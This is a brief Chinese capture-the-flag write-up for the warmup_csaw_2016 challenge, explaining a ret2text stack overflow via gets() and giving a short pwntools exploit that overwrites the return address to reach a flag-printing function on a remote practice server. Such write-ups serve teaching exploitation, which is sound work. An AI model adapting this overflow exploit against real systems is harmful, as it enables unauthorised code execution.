003-warmup_csaw_2016

考点：ret2text

查看源代码

分析：倘若我们能控制执行流到sub_40060D()函数中，就可以打印出flag，而源代码中有危险函数gets()

EXP

sub_40060D()函数的地址程序自己提供，且为固定的

from pwn import *
context.arch = 'amd64'
#sh = process("./003-warmup_csaw_2016")
sh = remote("node4.buuoj.cn", 29898)
sys_addr = 0x40060d

sh.recv()
payload = flat(cyclic(0x40 + 8), sys_addr)
sh.send(payload)
sh.interactive()

相关阅读:
SQL计算生日所属的星座 XuZhao
IIS 操作系统 .net FrameWork 的一些常见问题
Python面向对象4.实例属性、实例方法
Python面向对象6.init方法
Python面向对象3.定义类、创建对象
源码部署zabbix4.0监控
IE6 Select控件挡住DIV内容解决办法
转自网上的c#日期大全
已更新或者删除的行值不能使该行成为唯一行（sql2005）解决办法
asp 多行多列加分页代码

原文地址：https://www.cnblogs.com/labster/p/14995327.html